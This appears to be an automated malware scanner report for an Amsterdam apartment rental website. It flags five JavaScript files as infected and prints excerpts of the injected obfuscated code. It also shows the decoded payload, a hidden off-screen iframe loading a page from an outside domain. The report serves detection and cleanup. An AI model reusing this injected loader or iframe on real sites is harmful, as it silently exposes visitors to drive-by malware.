New scan:

Malware Scanner report for appartementen-amsterdam-visseringstaete.com

Malicious/Suspicious/Total urls checked
5/0/19
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.appartementen-amsterdam-visseringstaete.com/
200 OK
Content-Length: 16997
Content-Type: text/html
clean
http://www.appartementen-amsterdam-visseringstaete.com/media/system/js/caption.js
200 OK
Content-Length: 3800
Content-Type: application/x-javascript
clean
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/silverlight.js
200 OK
Content-Length: 9930
Content-Type: application/x-javascript
clean
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/wmvplayer.js
200 OK
Content-Length: 18313
Content-Type: application/x-javascript
clean
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/swfobject.js
200 OK
Content-Length: 14091
Content-Type: application/x-javascript
clean
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/avreloaded.js
200 OK
Content-Length: 4196
Content-Type: application/x-javascript
clean
http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_news_show_gk2/scripts/engine.js
200 OK
Content-Length: 5470
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var bebmain = 0;
if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) {
return bebmain;
}
return false;
}
function see_user_agent(){
var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre
... 4769 bytes are skipped ...
> $(TID).getElementsBySelector('tr')[(NR-NV)].setStyle('display','');
NV--;
$E('.gk_news_show_panel_amount_value',el).setHTML(NR-NV);
Cookie.set('gk_news_show_amount'+TID, (NR-NV), {duration: 14,path: "/"});

if(list){
for(var k=0;k<NC;k++){
if(((NR-NV)*NC)-(1+k) < amountOfLi) listOfLi[((NR-NV)*NC)-(1+k)].setStyle('display','none');
}
}
}
});
}
}
});
});

Decoded script:


<iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTY [Trj]

http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_gk_news_image_5/js/engine.js
200 OK
Content-Length: 8131
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var bebmain = 0;
if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) {
return bebmain;
}
return false;
}
function see_user_agent(){
var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre
... 7664 bytes are skipped ...
var $this = this;

if(!play) this.image_pause($G);
if((play || $G["autoanim"] == 1) && ($G["actual_anim"] == false)){
$G["actual_anim"] = (function(){
n = (n < max) ? n+1 : 0;
$this.image_anim(elID,mainwrap,wrap,slides,n,contents,$G,true);
}).periodical($G["anim_speed"]*2+$G["anim_interval"]);
}
}
},
image_pause : function($G){
$clear($G["actual_anim"]);
$G["actual_anim"] = false;
}
});

Decoded script:


<iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTY [Trj]

http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_gk_news_image_5/js/importer.php?mid=news_image_5_1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.45
200 OK
Content-Length: 219
Content-Type: text/javascript
clean
http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/template_scripts.js
200 OK
Content-Length: 3782
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var bebmain = 0;
if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) {
return bebmain;
}
return false;
}
function see_user_agent(){
var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre
... 2931 bytes are skipped ...
etStyle("padding-top").toInt() - chld.getStyle("padding-bottom").toInt();
if(h > max_height) max_height = h;
});

$ES('.users', $('bottom_wrap')).each(function(el, i){
el.getChildren()[0].setStyle("height", max_height+"px");
});
}
});
function changeStyle(style){
var file = template_path+'/css/style'+style+'.css';
new Asset.css(file);
new Cookie.set('gk16_style',style,{duration: 200,path: "/"});
actual_style = style;
}

Decoded script:


<iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTY [Trj]

http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/jmenu_2.js
200 OK
Content-Length: 3723
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var bebmain = 0;
if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) {
return bebmain;
}
return false;
}
function see_user_agent(){
var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre
... 2824 bytes are skipped ...
/>

levels.each(function(e,k){
e.each(function(a,l){
a.addEvent("mouseenter",function(){
a.getChildren()[1].setStyle("overflow","hidden");
effects2[k][l].toggle();
(function(){a.getChildren()[1].setStyle("overflow","")}).delay(500);
});

a.addEvent("mouseleave",function(){
a.getChildren()[1].setStyle("overflow","hidden");
effects2[k][l].stop();
effects2[k][l].set(0);
});
});
});
});

Decoded script:


<iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTY [Trj]

http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/ie.js
200 OK
Content-Length: 2227
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var bebmain = 0;
if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) {
return bebmain;
}
return false;
}
function see_user_agent(){
var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre
... 1215 bytes are skipped ...
'+'i'+'f'+'r'+'a'+'me'+'>');
}
};
})();
sfHover = function() {
var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI");
for (var i=0; i<sfEls.length; i++) {
sfEls[i].onmouseover=function() {
this.className+=" sfHover";
}
sfEls[i].onmouseout=function() {
this.className=this.className.replace(new RegExp(" sfHover\\b"), "");
}
}
}
if (window.attachEvent) window.attachEvent("onload", sfHover);

Decoded script:


function () {
var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI");
for (var i = 0; i < sfEls.length; i++) {
sfEls[i].onmouseover = function () {this.className += " sfHover";};
sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfHover\\b"), "");};
}
}
<iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTY [Trj]

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
200 OK
Content-Length: 1475
Content-Type: text/javascript
clean
http://connect.facebook.net/en_US/all.js
200 OK
Content-Length: 166991
Content-Type: application/x-javascript
clean
http://www.booking.com/general.html?tmpl=bookit;aid=330843;lang=en;hotel_id=251788;pb=1
HTTP/1.1 301 Moved Permanently
Date: Sat, 21 Jun 2014 14:53:10 GMT
Location: http://www.booking.com/general.html?tmpl=bookit
Server: nginx
X-Cnection: close
X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com
X-UA-Compatible: IE=edge
clean
http://www.booking.com/general.html?tmpl=bookit
HTTP/1.1 301 Moved Permanently
Date: Sat, 21 Jun 2014 14:53:10 GMT
Location: http://www.booking.com/general.html
Server: nginx
X-Cnection: close
X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com
X-UA-Compatible: IE=edge
clean
http://www.booking.com/general.html
HTTP/1.1 200 OK
Date: Sat, 21 Jun 2014 14:53:10 GMT
Server: nginx
Vary: User-Agent, Accept-Encoding
Content-Length: 227
Content-Type: text/html; charset=UTF-8
X-Cnection: close
X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com
X-UA-Compatible: IE=edge
clean
http://www.booking.com/index.html
HTTP/1.1 301 Moved Permanently
Date: Sat, 21 Jun 2014 14:53:11 GMT
Location: http://www.booking.com/
Server: nginx
X-Cnection: close
X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com
X-UA-Compatible: IE=edge
clean
http://www.booking.com/
200 OK
Content-Length: 183436
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com
Referer: http://www.google.com/search?q=appartementen-amsterdam-visseringstaete.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=appartementen-amsterdam-visseringstaete.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://appartementen-amsterdam-visseringstaete.com/

Result: appartementen-amsterdam-visseringstaete.com is not infected or malware details are not published yet.